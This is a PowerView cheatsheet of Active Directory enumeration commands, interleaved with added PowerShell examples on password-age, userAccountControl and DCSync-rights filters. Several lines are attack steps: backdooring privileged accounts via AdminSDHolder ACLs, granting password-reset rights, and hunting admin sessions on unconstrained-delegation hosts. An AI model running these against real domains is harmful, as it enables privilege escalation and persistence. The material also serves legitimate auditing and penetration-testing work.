PowerSploit (PowerView) cheatsheet
Get all the groups a user is effectively a member of, ‘recursing up’:
Get-NetGroup -UserName <USER>
Get all the effective members of a group, ‘recursing down’:
Get-NetGroupMember -GroupName <GROUP> -Recurse
Get the effective set of users who can administer a server:
Get-NetLocalGroup -Recurse SERVER.domain.local
Retrieve all the computers a GPP password applies to:
Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }
Get all users with passwords changed > 1 year ago:
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"
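Added worked example (not from the cheatsheet and not PowerView code): pwdLastSet is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC), so the cutoff above is built by converting a DateTime the same way. The helper below generalises the one-liner to any age and drops accounts whose pwdLastSet is 0, which means "must change password at next logon" and would otherwise satisfy the <= test. The function names New-StalePasswordFilter and ConvertFrom-FileTime are assumptions of this example, and the FILETIME value at the end is constructed.

```powershell
function New-StalePasswordFilter {
    # Builds an LDAP filter for passwords older than -Days. pwdLastSet=0 is
    # excluded: it marks "change at next logon", not a password that has
    # gone unchanged, and 0 <= any cutoff.
    param([int]$Days = 365, [switch]$EnabledOnly)
    $cutoff = (Get-Date).AddDays(-$Days).ToFileTimeUtc()
    $clause = "(pwdLastSet<=$cutoff)(!(pwdLastSet=0))"
    if ($EnabledOnly) {
        # bit 2 of userAccountControl is ACCOUNTDISABLE
        $clause += '(!(userAccountControl:1.2.840.113556.1.4.803:=2))'
    }
    "(&$clause)"
}

function ConvertFrom-FileTime {
    # Turns a raw pwdLastSet / lastLogonTimestamp integer back into a UTC DateTime.
    param([Parameter(ValueFromPipeline = $true)][long]$FileTime)
    process {
        if ($FileTime -le 0) { return $null }   # 0 = never set / must change at next logon
        [DateTime]::FromFileTimeUtc($FileTime)
    }
}

New-StalePasswordFilter -Days 365 -EnabledOnly
# (&(pwdLastSet<=<cutoff FILETIME>)(!(pwdLastSet=0))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))

# Constructed value, not from a directory: Unix time 1000000000 (2001-09-09T01:46:40Z)
# expressed as FILETIME, i.e. (1000000000 + 11644473600) * 10^7.
ConvertFrom-FileTime 126444736000000000
# 2001-09-09 01:46:40 (UTC)

# The filter drops straight into the cheatsheet's query:
# Get-NetUser -Filter (New-StalePasswordFilter -Days 365 -EnabledOnly)
```

ToFileTime() and ToFileTimeUtc() return the same number for a local-kind DateTime; the Utc variant is used to make the intent explicit. Note that PowerView's Get-NetUser already converts pwdlastset to a DateTime in its output, so ConvertFrom-FileTime is for raw ADSI results rather than PowerView objects.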
All enabled users:
Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"
All disabled users:
Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
All users that require smart card authentication:
Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
All users that don’t require smart card authentication:
Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Enumerate all servers that allow unconstrained delegation, and all users that aren’t marked as sensitive/not for delegation:
$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount
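Added worked example (not from the cheatsheet and not PowerView code) covering the userAccountControl filters above and the delegation queries: the OID 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule, so each clause tests one bit of the ADS_UF_* flag set (2 = ACCOUNTDISABLE, 262144 = SMARTCARD_REQUIRED, 524288 = TRUSTED_FOR_DELEGATION, 1048576 = NOT_DELEGATED). The helpers New-UacFilter and Test-UacValue and the sample UAC values are constructed for this example; the negation is written in the RFC 4515 form (!(...)), which AD accepts alongside the shorthand used in the cheatsheet.

```powershell
# ADS_UF_* flag values from the userAccountControl attribute documentation.
$UacFlags = @{
    ACCOUNTDISABLE                 = 0x0002
    LOCKOUT                        = 0x0010
    PASSWD_NOTREQD                 = 0x0020
    DONT_EXPIRE_PASSWORD           = 0x10000
    SMARTCARD_REQUIRED             = 0x40000
    TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
    NOT_DELEGATED                  = 0x100000   # "account is sensitive and cannot be delegated"
    DONT_REQ_PREAUTH               = 0x400000   # AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
}

function New-UacFilter {
    # LDAP clause that is true when every bit named in -Set is set and
    # no bit named in -Clear is set on userAccountControl.
    param([string[]]$Set = @(), [string[]]$Clear = @())
    $clauses = @()
    foreach ($name in $Set) {
        if (-not $UacFlags.ContainsKey($name)) { throw "unknown flag: $name" }
        $clauses += '(userAccountControl:1.2.840.113556.1.4.803:={0})' -f $UacFlags[$name]
    }
    foreach ($name in $Clear) {
        if (-not $UacFlags.ContainsKey($name)) { throw "unknown flag: $name" }
        $clauses += '(!(userAccountControl:1.2.840.113556.1.4.803:={0}))' -f $UacFlags[$name]
    }
    if ($clauses.Count -eq 1) { return $clauses[0] }
    return '(&' + ($clauses -join '') + ')'
}

function Test-UacValue {
    # Offline evaluation of the same condition against a raw UAC integer,
    # so the bit logic can be checked without touching a domain.
    param([int]$Uac, [string[]]$Set = @(), [string[]]$Clear = @())
    foreach ($name in $Set)   { if (($Uac -band $UacFlags[$name]) -eq 0) { return $false } }
    foreach ($name in $Clear) { if (($Uac -band $UacFlags[$name]) -ne 0) { return $false } }
    return $true
}

# Constructed sample accounts (name -> userAccountControl), not real directory data.
$Samples = @{
    'normal-user'   = 0x200      # NORMAL_ACCOUNT
    'disabled-user' = 0x202      # NORMAL_ACCOUNT | ACCOUNTDISABLE
    'svc-unconstr'  = 0x80200    # NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION
    'asrep-roast'   = 0x400200   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
}

# Enabled accounts that allow unconstrained delegation:
New-UacFilter -Set TRUSTED_FOR_DELEGATION -Clear ACCOUNTDISABLE
# (&(userAccountControl:1.2.840.113556.1.4.803:=524288)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))

$Samples.GetEnumerator() |
    Where-Object { Test-UacValue -Uac $_.Value -Set TRUSTED_FOR_DELEGATION -Clear ACCOUNTDISABLE } |
    ForEach-Object { $_.Key }
# svc-unconstr

# The clause plugs into PowerView unchanged, e.g. AS-REP roastable enabled users:
# Get-NetUser -Filter (New-UacFilter -Set DONT_REQ_PREAUTH -Clear ACCOUNTDISABLE)
```

The -AllowDelegation switch on Get-NetUser corresponds to the NOT_DELEGATED bit being clear; pairing -Clear NOT_DELEGATED with -Set TRUSTED_FOR_DELEGATION on Get-NetComputer-style queries gives the same "delegatable target" view the cheatsheet builds with two separate calls.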
Enumerate servers that allow unconstrained kerberos delegation and show all users logged in:
Invoke-UserHunter -Unconstrained -ShowAll
Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation:
Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation
Get the logged on users for all machines in any server OU in a particular domain:
Get-NetOU *server* -Domain <domain> | %{ Get-NetComputer -ADSPath $_ | %{ Get-NetLoggedOn -ComputerName $_ } }
Find all users with an SPN set (likely service accounts):
Get-NetUser -SPN
Find all service accounts in “Domain Admins”:
Get-NetUser -SPN | ?{ $_.memberof -match 'Domain Admins' }
Hunt for all privileged users (adminCount=1):
Invoke-UserHunter -AdminCount
Find users with sidHistory set:
Get-NetUser -Filter '(sidHistory=*)'
Enumerate all global catalogs in the forest:
Turn a list of computer short names to FQDNs:
gc computers.txt | %{ Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)" }
Find interesting .vbs/.bat/.ps1 scripts on domain controllers:
Invoke-FileFinder -SearchSYSVol
Enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through:
$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy
$DomainPolicy.SystemAccess
Enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default:
$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
$DcPolicy.PrivilegeRights
Enumerate which machines a particular group has local admin rights on:
Find-GPOLocation -GroupName <GROUP>
Enumerate which machines a given user in the specified domain has RDP access to, reflecting queries through a particular DC:
Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP
Export a CSV of all GPO mappings:
Find-GPOLocation | %{ $_.computers = $_.computers -join ", "; $_ } | Export-CSV -NoTypeInformation gpo_map.csv
Use alternate credentials for searching for files on the domain:
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential
Enumerate who has rights to the ‘matt’ user in ‘testlab.local’, resolving rights GUIDs to names:
Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs
Grant user ‘will’ the rights to change ‘matt’s password:
Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword
Audit the permissions of AdminSDHolder, resolving GUIDs:
Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs
Backdoor the ACLs of all privileged accounts with the ‘matt’ account through AdminSDHolder abuse:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All
Retrieve most users who can perform DC replication against dev.testlab.local (i.e. DCSync):
Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ?{
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
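Added worked example (not from the cheatsheet and not PowerView code) of why the query above says "most": 'replication-get' matches DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set individually, but replicating secrets needs the first two together (or GenericAll, or an ExtendedRight ACE over all rights, or WriteDacl, which lets the principal grant the pair to itself). The function below groups ACEs by identity and reports who actually has a working combination. Get-DcSyncPrincipal is a name chosen for this example, and the ACE objects are constructed in the shape Get-ObjectAcl -ResolveGUIDs emits (IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType).

```powershell
$ReplGetChanges    = 'DS-Replication-Get-Changes'
$ReplGetChangesAll = 'DS-Replication-Get-Changes-All'

function Get-DcSyncPrincipal {
    # Pipe resolved ACEs in; get one row per identity that can DCSync and why.
    param([Parameter(ValueFromPipeline = $true)][object[]]$Ace)
    begin { $byIdentity = @{} }
    process {
        foreach ($a in $Ace) {
            # Deny ACEs are ignored here; a Deny on the same right would need ordering logic.
            if ($a.AccessControlType -and ([string]$a.AccessControlType) -ne 'Allow') { continue }
            $id = [string]$a.IdentityReference
            if (-not $byIdentity.ContainsKey($id)) { $byIdentity[$id] = @{} }
            $rights = [string]$a.ActiveDirectoryRights
            if ($rights -match 'GenericAll') { $byIdentity[$id]['GenericAll'] = $true }
            if ($rights -match 'WriteDacl')  { $byIdentity[$id]['WriteDacl']  = $true }
            if ($rights -match 'ExtendedRight') {
                $t = [string]$a.ObjectType
                if ($t -eq 'All') {
                    # ObjectType 'All' = every extended right, so both replication rights.
                    $byIdentity[$id][$ReplGetChanges]    = $true
                    $byIdentity[$id][$ReplGetChangesAll] = $true
                } elseif ($t) {
                    $byIdentity[$id][$t] = $true
                }
            }
        }
    }
    end {
        foreach ($id in $byIdentity.Keys) {
            $r = $byIdentity[$id]
            $reason = $null
            if ($r['GenericAll']) { $reason = 'GenericAll' }
            elseif ($r[$ReplGetChanges] -and $r[$ReplGetChangesAll]) { $reason = "$ReplGetChanges + $ReplGetChangesAll" }
            elseif ($r['WriteDacl']) { $reason = 'WriteDacl (can grant itself the replication rights)' }
            if ($reason) { [pscustomobject]@{ Identity = $id; Reason = $reason } }
        }
    }
}

# Constructed ACEs, not real directory data.
$SampleAces = @(
    [pscustomobject]@{ IdentityReference = 'TESTLAB\Domain Controllers'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = $ReplGetChanges;    AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'TESTLAB\Domain Controllers'; ActiveDirectoryRights = 'ExtendedRight'; ObjectType = $ReplGetChangesAll; AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'TESTLAB\backup-svc';         ActiveDirectoryRights = 'ExtendedRight'; ObjectType = $ReplGetChanges;    AccessControlType = 'Allow' }  # only half the pair
    [pscustomobject]@{ IdentityReference = 'TESTLAB\helpdesk';           ActiveDirectoryRights = 'WriteDacl';     ObjectType = 'All';              AccessControlType = 'Allow' }
    [pscustomobject]@{ IdentityReference = 'TESTLAB\Domain Admins';      ActiveDirectoryRights = 'GenericAll';    ObjectType = 'All';              AccessControlType = 'Allow' }
)

$SampleAces | Get-DcSyncPrincipal | Format-Table -AutoSize
# Domain Controllers (both replication rights), helpdesk (WriteDacl) and
# Domain Admins (GenericAll) are reported; backup-svc, which the cheatsheet's
# 'replication-get' match would also list, is not.

# Against a live domain, feeding the cheatsheet's query into the function:
# Get-ObjectAcl -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | Get-DcSyncPrincipal
```

Two things the cheatsheet one-liner and this function still do not cover: rights inherited through group membership (resolve the IdentityReference with Get-NetGroupMember -Recurse before deciding a principal is benign) and WriteOwner, which also leads to control of the DACL.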
Find linked DA accounts using name correlation:
Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a = $_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname, samaccountname
Save a PowerView object to disk for later usage:
Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out
Find any machine accounts in privileged groups:
Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{ $_.MemberName -like '*$' }
Enumerate permissions for GPOs where users have some kind of modify rights:
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild") }
Find all policies applied to a given machine:
Get-NetGPO -ComputerName WINDOWS1.testlab.local
Find the user/groups that have read access to the LAPS password property for a specified computer:
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |
    Select-Object -ExpandProperty distinguishedname |
    ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {
        Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
    } | Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        Convert-NameToSid $_.IdentityReference
    } | Select-Object -ExpandProperty SID | Get-ADObject
Get the ACLs for all OUs where someone is allowed to read the LAPS password attribute:
Get-NetOU -FullData |
    Get-ObjectAcl -ResolveGUIDs |
    Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
        $_
    }
Perform a user ‘zone transfer’ by exporting all AD DNS records from all zones, exporting to a .csv:
Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv
Return all universal security groups in a forest with foreign members:
Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname, distinguishedname, member | ForEach-Object {
    $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
    $_.Member = $_.Member | ForEach-Object {
        $MemberDomain = $_.subString($_.IndexOf("DC="))
        if ($GroupDomain -ne $MemberDomain) {
            $_
        }
    }
    $_
} | Where-Object { $_.Member }